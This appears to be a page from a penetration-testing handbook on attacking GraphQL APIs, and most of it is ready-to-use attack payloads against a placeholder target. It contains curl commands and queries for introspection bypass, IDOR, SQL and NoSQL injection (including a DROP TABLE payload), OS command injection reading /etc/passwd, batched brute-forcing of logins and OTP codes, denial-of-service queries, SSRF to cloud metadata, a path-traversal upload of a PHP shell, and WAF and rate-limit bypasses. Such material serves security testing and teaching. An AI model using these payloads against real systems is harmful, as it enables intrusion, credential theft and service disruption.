GraphQL Deep Dive

Skill Level: Intermediate to Advanced Prerequisites: GraphQL basics, API testing

Reconnaissance

Endpoint Discovery

# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/api
/graphql/graphql
/graphiql
/graphiql.php
/graphiql.js
/graphql.php
/graphql/schema.json
/v1/graphql
/api/graphql
/query
/gql
/playground

# Nuclei template
nuclei -u https://target.com -t graphql-detect.yaml

Introspection Query

# Full introspection query
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"}'

# Quick schema dump
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { types { name fields { name } } } }"}'

# Get all queries
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { queryType { fields { name description } } } }"}'

# Get all mutations
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { mutationType { fields { name description } } } }"}'

Tools for Discovery

# GraphQL Voyager - Schema visualization
# https://github.com/APIs-guru/graphql-voyager

# graphql-cop - Security auditor
# https://github.com/dolevf/graphql-cop
python graphql-cop.py -t https://target.com/graphql

# InQL - Burp extension & CLI
# https://github.com/doyensec/inern
inql -t https://target.com/graphql

# graphw00f - Fingerprinting
# https://github.com/dolevf/graphw00f
python main.py -d -t https://target.com/graphql

Authentication Bypass

Bypass Introspection Restrictions

# Try GET requests
curl "https://target.com/graphql?query=\{__schema\{types\{name\}\}\}"

# Add X-Requested-With header
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -H "X-Requested-With: XMLHttpRequest" \
  -d '{"query":"{ __schema { types { name } } }"}'

# Use __type instead of __schema
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __type(name: \"User\") { fields { name } } }"}'

# Field suggestions (if introspection disabled but suggestions enabled)
# Send invalid query and check error message for field suggestions
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ user { asdfasdf } }"}'
# Response: Did you mean "id", "name", "email"?

# Clairvoyance - Recover schema without introspection
# https://github.com/nikitastupin/clairvoyance
python -m clairvoyance -o schema.json https://target.com/graphql

Authorization Flaws

# IDOR - Access other users' data
query {
  user(id: "1") {
    id
    email
    password
    creditCard
  }
}

# Test with different IDs
query {
  user(id: "2") { ... }
}

# Access admin-only fields
query {
  user(id: "1") {
    id
    email
    isAdmin
    role
    permissions
  }
}

# Access nested objects
query {
  user(id: "1") {
    orders {
      id
      total
      paymentDetails {
        cardNumber
      }
    }
  }
}

Injection Attacks

SQL Injection

# Basic SQLi in arguments
query {
  user(name: "admin' OR '1'='1") {
    id
    email
  }
}

# Union-based
query {
  user(name: "' UNION SELECT username, password FROM users--") {
    name
    email
  }
}

# In filter arguments
query {
  users(filter: { name_contains: "' OR 1=1--" }) {
    id
    name
  }
}

# In order by
query {
  users(orderBy: "name; DROP TABLE users--") {
    id
  }
}

NoSQL Injection

# MongoDB injection
query {
  user(name: "{\"$gt\": \"\"}") {
    id
    email
  }
}

# Regex injection
query {
  users(filter: { name_regex: ".*" }) {
    id
    email
    password
  }
}

OS Command Injection

# If backend executes shell commands
mutation {
  exportData(format: "csv; cat /etc/passwd") {
    url
  }
}

mutation {
  generateReport(type: "pdf`whoami`") {
    status
  }
}

Batching Attacks

Query Batching for Brute Force

# Array-based batching
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '[
    {"query":"mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
    {"query":"mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
    {"query":"mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
  ]'

# Alias-based batching (single request, multiple operations)
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation { 
    a1: login(user:\"admin\", pass:\"password1\") { token }
    a2: login(user:\"admin\", pass:\"password2\") { token }
    a3: login(user:\"admin\", pass:\"password3\") { token }
  }"}'

OTP/2FA Bypass via Batching

# Brute force OTP in single request
mutation {
  v0: verifyOTP(code: "000000") { success }
  v1: verifyOTP(code: "000001") { success }
  v2: verifyOTP(code: "000002") { success }
  # ... continue to 999999
}

Denial of Service

Recursive Query (Circular References)

# If user has friends that are also users
query {
  user(id: "1") {
    friends {
      friends {
        friends {
          friends {
            friends {
              friends {
                # Nest deeper...
                name
              }
            }
          }
        }
      }
    }
  }
}

Field Duplication

query {
  users {
    name name name name name name name name name name
    email email email email email email email email email email
    # Repeat many times
  }
}

Batch Query DoS

# Send thousands of queries in array
# Generate with script
python3 -c "import json; print(json.dumps([{'query':'{ users { name } }'}]*10000))" | \
  curl -X POST https://target.com/graphql \
    -H "Content-Type: application/json" \
    -d @-

Directive Overloading

query {
  users @skip(if: false) @skip(if: false) @skip(if: false) @skip(if: false) {
    name
  }
}

SSRF via GraphQL

# If there's a URL fetch field
mutation {
  importUrl(url: "http://169.254.169.254/latest/meta-data/") {
    content
  }
}

# File:// protocol
mutation {
  importUrl(url: "file:///etc/passwd") {
    content
  }
}

# Internal services
mutation {
  webhook(url: "http://internal-service:8080/admin") {
    status
  }
}

File Upload Attacks

# GraphQL multipart request
curl -X POST https://target.com/graphql \
  -H "Content-Type: multipart/form-data" \
  -F 'operations={"query":"mutation($file: Upload!) { uploadFile(file: $file) { url } }","variables":{"file":null}}' \
  -F 'map={"0":["variables.file"]}' \
  -F '[email protected]'

# Test path traversal in filename
-F '[email protected];filename=../../../var/www/html/shell.php'

Subscriptions Attacks

WebSocket Hijacking

// Connect to subscription endpoint
const ws = new WebSocket('wss://target.com/graphql', 'graphql-ws');

ws.onopen = () => {
  // Initialize connection
  ws.send(JSON.stringify({
    type: 'connection_init',
    payload: {}
  }));
  
  // Subscribe to sensitive events
  ws.send(JSON.stringify({
    id: '1',
    type: 'start',
    payload: {
      query: `subscription {
        onUserCreated {
          id
          email
          password
        }
      }`
    }
  }));
};

ws.onmessage = (event) => {
  console.log(JSON.parse(event.data));
};

Tools & Automation

GraphQL-specific Tools

# BatchQL - Batched query security testing
# https://github.com/assetnote/batchql
python batchql.py -e https://target.com/graphql

# CrackQL - Brute force via batching
# https://github.com/nicholasaleks/CrackQL
python CrackQL.py -t https://target.com/graphql \
  -q "mutation { login(email: \"VARIABLE\", password: \"PASSWORD\") { token } }" \
  -i usernames.txt

# graphql-path-enum - Find paths to sensitive types
# https://gitlab.com/dee-see/graphql-path-enum
graphql-path-enum -i schema.json -t PrivateData

Burp Suite Integration

# InQL Scanner extension
# 1. Install from BApp Store
# 2. Send GraphQL request to InQL Scanner
# 3. Analyze schema and generate queries
# 4. Test mutations and subscriptions

# GraphQL Raider extension
# Automatic query modification and testing

Defense Bypass Techniques

Rate Limiting Bypass

# Alias-based batching bypasses per-query rate limits
mutation {
  q1: resetPassword(email: "[email protected]")
  q2: resetPassword(email: "[email protected]")
  q3: resetPassword(email: "[email protected]")
}

# Different operation names
mutation op1 { resetPassword(email: "[email protected]") }
mutation op2 { resetPassword(email: "[email protected]") }

WAF Bypass

# Change Content-Type
Content-Type: application/graphql
Content-Type: text/plain

# Use GET with query parameter
GET /graphql?query={users{name}}

# URL encode
GET /graphql?query=%7Busers%7Bname%7D%7D

# Add spaces/newlines
{"query":"{\n  users\n  {\n    name\n  }\n}"}

# Use fragments
query { 
  ...UserFields 
}
fragment UserFields on Query {
  users { name }
}

Checklist

## Reconnaissance
- [ ] Find GraphQL endpoint
- [ ] Test introspection
- [ ] Fingerprint GraphQL implementation
- [ ] Map schema (queries, mutations, subscriptions)

## Authentication/Authorization
- [ ] Test IDOR on object access
- [ ] Test field-level authorization
- [ ] Test mutation authorization
- [ ] Check for sensitive data exposure

## Injection
- [ ] SQL injection in arguments
- [ ] NoSQL injection
- [ ] Command injection
- [ ] SSRF via URL fields

## DoS
- [ ] Test circular queries
- [ ] Test field duplication
- [ ] Test batch query limits
- [ ] Test query depth limits

## Other
- [ ] Batching for brute force
- [ ] File upload attacks
- [ ] Subscription hijacking
- [ ] Rate limiting bypass

API Security - REST/gRPC testing
SSRF - Server-side request forgery
SQL Injection - Database attacks

PreviousRace Conditions NextOAuth/PKCE Attacks

Last updated 8 days ago

Was this helpful?

hashtagReconnaissance

hashtagEndpoint Discovery

hashtagIntrospection Query

hashtagTools for Discovery

hashtagAuthentication Bypass

hashtagBypass Introspection Restrictions

hashtagAuthorization Flaws

hashtagInjection Attacks

hashtagSQL Injection

hashtagNoSQL Injection

hashtagOS Command Injection

hashtagBatching Attacks

hashtagQuery Batching for Brute Force

hashtagOTP/2FA Bypass via Batching

hashtagDenial of Service

hashtagRecursive Query (Circular References)

hashtagField Duplication

hashtagBatch Query DoS

hashtagDirective Overloading

hashtagSSRF via GraphQL

hashtagFile Upload Attacks

hashtagSubscriptions Attacks

hashtagWebSocket Hijacking

hashtagTools & Automation

hashtagGraphQL-specific Tools

hashtagBurp Suite Integration

hashtagDefense Bypass Techniques

hashtagRate Limiting Bypass

hashtagWAF Bypass

hashtagChecklist

hashtagRelated Topics

Reconnaissance

Endpoint Discovery

Introspection Query

Tools for Discovery

Authentication Bypass

Bypass Introspection Restrictions

Authorization Flaws

Injection Attacks

SQL Injection

NoSQL Injection

OS Command Injection

Batching Attacks

Query Batching for Brute Force

OTP/2FA Bypass via Batching

Denial of Service

Recursive Query (Circular References)

Field Duplication

Batch Query DoS

Directive Overloading

SSRF via GraphQL

File Upload Attacks

Subscriptions Attacks

WebSocket Hijacking

Tools & Automation

GraphQL-specific Tools

Burp Suite Integration

Defense Bypass Techniques

Rate Limiting Bypass

WAF Bypass

Checklist

Related Topics